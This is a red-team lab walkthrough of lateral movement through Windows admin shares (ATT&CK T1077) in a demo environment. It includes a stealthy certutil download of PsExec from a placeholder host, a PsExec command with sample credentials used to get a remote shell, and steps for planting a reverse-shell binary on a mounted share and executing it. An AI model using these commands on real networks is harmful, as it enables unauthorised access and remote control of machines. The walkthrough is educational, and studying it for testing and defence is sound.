Windows Admin Shares

ID: T1077 Tactic: Lateral Movement

Windows system have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$ , and IPC$.

Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration patch levels.

The Net utility can be used to connect to Windows admin shares on remote systems using net usecommands with valid credentials.

In this first example our Adversary has gain a shell on the Network, Enumerated and Dumped Credentials. But now he need's to move laterally on the network, to pivot between machines and find more info in the environment, in here comes a great Tools a Windows signed binary called PsExec.exe, It comes from the Microsoft Sysinternal Suite and allows user to execute PowerShell ( or cmd) on remote hosts on Port 445 (SMB) using named pipes. It first connects to the ADMIN$ share on the target over SMB, uploads PSEXESVC.EXE and uses Service Control Manager to start the .exe, which creates a named pipe on the remote system, and finally uses that pipe for I\O (Input and Output).

As we still want to be as stealthy as possible I used a Windows Tool to download the EXE.

certutil.exe -urlcache -split -f http://IP/PsExec64.exe PsExec64.exe

First I will see where am I located.

For the sake of this Demo I have all the creds, and Computer's I want to, and can access to.

Now let's use PsExec to get access to another machine, my current location is DESKTOP-CHARLIE and I will move to DESKTOP-DELTA.

Once PsExec is dropped onto the Target machine and gathered the necessary credentials we can move laterally onto a different host, with the following syntax we can call CMD to execute on the Remote Machine.

Currently I am located in Charlie:

And my Target is the Delta Machine

I will use the following syntax to catch a shell

PsExec64.exe \\192.168.1.240 -u David -p Password1 cmd

Also we can use the net shareand net use commands this technique is not necessarily a shell gain on the machine, since we have the proper permissions for this share we can Mount it on our local machine and view file's just as if we were on the machine itself, but be wary this will not help in enumerating the "remote machine" as this only gives us read/write access onto a share and it's files we don't necessarily have a session on the remote machine, but with this in mind we can copy a binary on the shares mounted and use other techniques such as a Remote Task to execute this binary and gain a shell on the remote machine.

In the following I will mount a share on the Controlled machine and I will explore the share from a remote PC and here as from here can also READ/WRITE Files.

From CHARLIE Machine I will mount DELTA share and find a proof.txt file to demonstrate my technique on moving onto a different share, but as we can remember enumeration will not work as we still need to execute the binary on the remote machine and not from the shell session itself as we will still be the user that executes it.

With net share we can see the available shares tp discover and view.

We currently hold the credentials for the user's in DELTA so we will use David again to mount a share and start discovering more interesting file's on the Remote PC with ever executing code in the remote machine. You will be asked for credentials just provided them and it will be good.

Will check the Share.

Viewing the Folders in the remote share.

And we can verify that we can Read Files and WRITE on the remote shares that is currently available.

Now what about catching a shell on the Remote system if we have this type of access? Well a known way is to copy a binary on the remote host and execute a remote task or the use of WMI both are valid here.

First let's Catch a shell from a Kali box and work from there.

I created a new binary that connects back to 1338 port, let's see that our share is currently connected.

And copy it to a Folder that David can owns for now I will move this to the Desktop Folder. I downloaded a new binary onto the folder I slightly changed the name and the port it connect's back to is port 1338.

Then from the command prompt we can copy the binary onto the Share and execute it, but how do we execute a remote binary so that we are currently on that machine instead of still being the current user? Well we can create a remote task or modify a remote service to catch the shell, we can also use WMI to execute a remote binary on a remote host.

Depending on where is your Binary located you would use copy BINARY_PATH TARGET_PATH

When you mount a share make sure to remember the Letter of the Drive you used, you wont be able to copy if you use a UNC Path [ \\DESKTOP-DELTA\ ]

Remember, here the User and credential's for the remote host are known, you will probably find alternatives on how to achieve this.